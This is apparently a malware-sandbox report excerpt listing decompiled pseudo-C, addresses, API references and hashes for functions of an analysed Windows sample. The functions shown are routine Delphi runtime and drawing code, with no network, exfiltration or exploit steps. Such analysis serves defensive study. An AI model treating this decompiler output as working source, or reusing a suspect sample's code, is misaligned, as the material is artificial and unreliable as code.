                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 1504017990-2364942553
                                                                                                                                                                                                                            • Opcode ID: 292f5edd8ce152165e351f987fd279c188195222a31a90e638a1b1ddc32d9408
                                                                                                                                                                                                                            • Instruction ID: c735307bb3b187497a5fd69113a8ab7abc351a98bda77d86b61d484baaaa887a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 292f5edd8ce152165e351f987fd279c188195222a31a90e638a1b1ddc32d9408
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C21B230A00204AFCB01EF55ED92E597BB4EB19728FA145BBF400977E0DB796C10CA59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C82C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                                                                                                                                                                            0x0042c835
                                                                                                                                                                                                                            0x0042c838
                                                                                                                                                                                                                            0x0042c842
                                                                                                                                                                                                                            0x0042c867
                                                                                                                                                                                                                            0x0042c86f
                                                                                                                                                                                                                            0x0042c88f
                                                                                                                                                                                                                            0x0042c894
                                                                                                                                                                                                                            0x0042c89f
                                                                                                                                                                                                                            0x0042c8aa
                                                                                                                                                                                                                            0x0042c8b4
                                                                                                                                                                                                                            0x0042c8b5
                                                                                                                                                                                                                            0x0042c8b6
                                                                                                                                                                                                                            0x0042c8b7
                                                                                                                                                                                                                            0x0042c8b8
                                                                                                                                                                                                                            0x0042c8b9
                                                                                                                                                                                                                            0x0042c8c3
                                                                                                                                                                                                                            0x0042c8c5
                                                                                                                                                                                                                            0x0042c8cd
                                                                                                                                                                                                                            0x0042c8ce
                                                                                                                                                                                                                            0x0042c8ce
                                                                                                                                                                                                                            0x0042c8d3
                                                                                                                                                                                                                            0x0042c8d3
                                                                                                                                                                                                                            0x0042c844
                                                                                                                                                                                                                            0x0042c856
                                                                                                                                                                                                                            0x0042c863
                                                                                                                                                                                                                            0x0042c863
                                                                                                                                                                                                                            0x0042c8dd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C899
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C8A4
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                                                                                                            • API String ID: 1539801207-1633989206
                                                                                                                                                                                                                            • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406B91 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
				 *0x49b00c = 2;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e04e = 2;
				 *0x49e000 = E00405998;
				if(E00403A2C() != 0) {
					_t3 = E00403A5C();
				}
				E00403B20(_t3);
				 *0x49e054 = 0xd7b0;
				 *0x49e220 = 0xd7b0;
				 *0x49e3ec = 0xd7b0;
				 *0x49e040 = GetCommandLineA();
				 *0x49e03c = E004013AC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x49e5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x49e034 = _t11;
				return _t11;
			}





                                                                                                                                                                                                                            0x00406b91
                                                                                                                                                                                                                            0x00406b96
                                                                                                                                                                                                                            0x00406b9b
                                                                                                                                                                                                                            0x00406b9d
                                                                                                                                                                                                                            0x00406ba4
                                                                                                                                                                                                                            0x00406bae
                                                                                                                                                                                                                            0x00406bb8
                                                                                                                                                                                                                            0x00406bbf
                                                                                                                                                                                                                            0x00406bd0
                                                                                                                                                                                                                            0x00406bd2
                                                                                                                                                                                                                            0x00406bd2
                                                                                                                                                                                                                            0x00406bd7
                                                                                                                                                                                                                            0x00406bdc
                                                                                                                                                                                                                            0x00406be5
                                                                                                                                                                                                                            0x00406bee
                                                                                                                                                                                                                            0x00406bfc
                                                                                                                                                                                                                            0x00406c06
                                                                                                                                                                                                                            0x00406c1a
                                                                                                                                                                                                                            0x00406c53
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c2a
                                                                                                                                                                                                                            0x00406c42
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c2a
                                                                                                                                                                                                                            0x00406c58
                                                                                                                                                                                                                            0x00406c5d
                                                                                                                                                                                                                            0x00406c62

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
                                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C0B
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C1C
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 00406C38
                                                                                                                                                                                                                              • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                                                            • String ID: H4c
                                                                                                                                                                                                                            • API String ID: 3734044017-3998860927
                                                                                                                                                                                                                            • Opcode ID: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                                                                                                                                                                                            • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004047C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E004047C0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x49e04c == 0) {
					if( *0x49b034 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
						 *0x49e238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
				}
			}





                                                                                                                                                                                                                            0x004047c8
                                                                                                                                                                                                                            0x00404828
                                                                                                                                                                                                                            0x00404838
                                                                                                                                                                                                                            0x00404838
                                                                                                                                                                                                                            0x0040483e
                                                                                                                                                                                                                            0x004047ca
                                                                                                                                                                                                                            0x004047d3
                                                                                                                                                                                                                            0x004047e3
                                                                                                                                                                                                                            0x004047e3
                                                                                                                                                                                                                            0x004047ff
                                                                                                                                                                                                                            0x00404820
                                                                                                                                                                                                                            0x00404820

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00404838
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                            • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00448030 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00447BD0(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00429914(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E0042AD38(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00419804( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E00425980(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00447D0C(_t118));
						L0042C454();
						E00419804(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E00425C68(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L004072B8();
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E00425C68(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L004072B8();
						return _t96;
					}
					_push(_a8);
					_push(E00447A20(_t142));
					E00448008(_t118, _t142);
					_push(E00447A20(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00425C68(__ecx));
					_push(_v8);
					_t117 = E00447D0C(_t118);
					_push(_t117);
					L0042C454();
					return _t117;
				}
				return _t46;
			}




















                                                                                                                                                                                                                            0x00448030
                                                                                                                                                                                                                            0x00448039
                                                                                                                                                                                                                            0x0044803b
                                                                                                                                                                                                                            0x0044803e
                                                                                                                                                                                                                            0x00448042
                                                                                                                                                                                                                            0x00448049
                                                                                                                                                                                                                            0x0044804f
                                                                                                                                                                                                                            0x00448053
                                                                                                                                                                                                                            0x00448099
                                                                                                                                                                                                                            0x0044809d
                                                                                                                                                                                                                            0x004480ab
                                                                                                                                                                                                                            0x004480ad
                                                                                                                                                                                                                            0x004480b4
                                                                                                                                                                                                                            0x004480c0
                                                                                                                                                                                                                            0x004480c8
                                                                                                                                                                                                                            0x004480ca
                                                                                                                                                                                                                            0x004480ca
                                                                                                                                                                                                                            0x004480dd
                                                                                                                                                                                                                            0x004480f1
                                                                                                                                                                                                                            0x004480f9
                                                                                                                                                                                                                            0x004480fd
                                                                                                                                                                                                                            0x00448102
                                                                                                                                                                                                                            0x00448103
                                                                                                                                                                                                                            0x00448108
                                                                                                                                                                                                                            0x0044810a
                                                                                                                                                                                                                            0x0044810c
                                                                                                                                                                                                                            0x0044810e
                                                                                                                                                                                                                            0x00448110
                                                                                                                                                                                                                            0x00448112
                                                                                                                                                                                                                            0x00448114
                                                                                                                                                                                                                            0x00448123
                                                                                                                                                                                                                            0x00448127
                                                                                                                                                                                                                            0x0044812f
                                                                                                                                                                                                                            0x00448130
                                                                                                                                                                                                                            0x0044814c
                                                                                                                                                                                                                            0x0044815e
                                                                                                                                                                                                                            0x00448169
                                                                                                                                                                                                                            0x00448175
                                                                                                                                                                                                                            0x0044817d
                                                                                                                                                                                                                            0x00448185
                                                                                                                                                                                                                            0x0044818a
                                                                                                                                                                                                                            0x0044818f
                                                                                                                                                                                                                            0x00448191
                                                                                                                                                                                                                            0x00448196
                                                                                                                                                                                                                            0x0044819a
                                                                                                                                                                                                                            0x0044819e
                                                                                                                                                                                                                            0x004481a3
                                                                                                                                                                                                                            0x004481a7
                                                                                                                                                                                                                            0x004481a7
                                                                                                                                                                                                                            0x004481a8
                                                                                                                                                                                                                            0x004481a9
                                                                                                                                                                                                                            0x004481aa
                                                                                                                                                                                                                            0x004481b7
                                                                                                                                                                                                                            0x004481c3
                                                                                                                                                                                                                            0x004481cb
                                                                                                                                                                                                                            0x004481d3
                                                                                                                                                                                                                            0x004481d8
                                                                                                                                                                                                                            0x004481dd
                                                                                                                                                                                                                            0x004481df
                                                                                                                                                                                                                            0x004481e4
                                                                                                                                                                                                                            0x004481e8
                                                                                                                                                                                                                            0x004481ec
                                                                                                                                                                                                                            0x004481f0
                                                                                                                                                                                                                            0x004481f1
                                                                                                                                                                                                                            0x004481f4
                                                                                                                                                                                                                            0x004481f5
                                                                                                                                                                                                                            0x004481f6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004481f6
                                                                                                                                                                                                                            0x00448058
                                                                                                                                                                                                                            0x00448061
                                                                                                                                                                                                                            0x00448064
                                                                                                                                                                                                                            0x0044806e
                                                                                                                                                                                                                            0x0044806f
                                                                                                                                                                                                                            0x00448071
                                                                                                                                                                                                                            0x00448076
                                                                                                                                                                                                                            0x0044807a
                                                                                                                                                                                                                            0x00448082
                                                                                                                                                                                                                            0x00448086
                                                                                                                                                                                                                            0x00448089
                                                                                                                                                                                                                            0x0044808e
                                                                                                                                                                                                                            0x0044808f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044808f
                                                                                                                                                                                                                            0x00448201

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                                                                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                                                                                                                                                                                              • Part of subcall function 00448008: 73752240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73752430Color$73752240Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1345666146-0
                                                                                                                                                                                                                            • Opcode ID: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                                                                                                                                                                                            • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F740 Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043F740(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004398B8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E00441704(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E00441704(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004398B8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0043C130(_t82, _t99, 0x14, 0);
				E0043C130(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E0041AC6C( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043F740(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                                                                                                                                                                                            0x0043f74b
                                                                                                                                                                                                                            0x0043f74d
                                                                                                                                                                                                                            0x0043f74f
                                                                                                                                                                                                                            0x0043f75b
                                                                                                                                                                                                                            0x0043f765
                                                                                                                                                                                                                            0x0043f777
                                                                                                                                                                                                                            0x0043f77c
                                                                                                                                                                                                                            0x0043f780
                                                                                                                                                                                                                            0x0043f795
                                                                                                                                                                                                                            0x0043f7af
                                                                                                                                                                                                                            0x0043f7b4
                                                                                                                                                                                                                            0x0043f7b9
                                                                                                                                                                                                                            0x0043f7bb
                                                                                                                                                                                                                            0x0043f7c2
                                                                                                                                                                                                                            0x0043f7c2
                                                                                                                                                                                                                            0x0043f797
                                                                                                                                                                                                                            0x0043f797
                                                                                                                                                                                                                            0x0043f79e
                                                                                                                                                                                                                            0x0043f79e
                                                                                                                                                                                                                            0x0043f7c9
                                                                                                                                                                                                                            0x0043f7db
                                                                                                                                                                                                                            0x0043f7ea
                                                                                                                                                                                                                            0x0043f7f7
                                                                                                                                                                                                                            0x0043f80f
                                                                                                                                                                                                                            0x0043f80f
                                                                                                                                                                                                                            0x0043f81f
                                                                                                                                                                                                                            0x0043f82f
                                                                                                                                                                                                                            0x0043f834
                                                                                                                                                                                                                            0x0043f83c
                                                                                                                                                                                                                            0x0043f87b
                                                                                                                                                                                                                            0x0043f880
                                                                                                                                                                                                                            0x0043f885
                                                                                                                                                                                                                            0x0043f891
                                                                                                                                                                                                                            0x0043f83e
                                                                                                                                                                                                                            0x0043f841
                                                                                                                                                                                                                            0x0043f844
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f847
                                                                                                                                                                                                                            0x0043f84a
                                                                                                                                                                                                                            0x0043f851
                                                                                                                                                                                                                            0x0043f85a
                                                                                                                                                                                                                            0x0043f85f
                                                                                                                                                                                                                            0x0043f863
                                                                                                                                                                                                                            0x0043f86e
                                                                                                                                                                                                                            0x0043f86e
                                                                                                                                                                                                                            0x0043f873
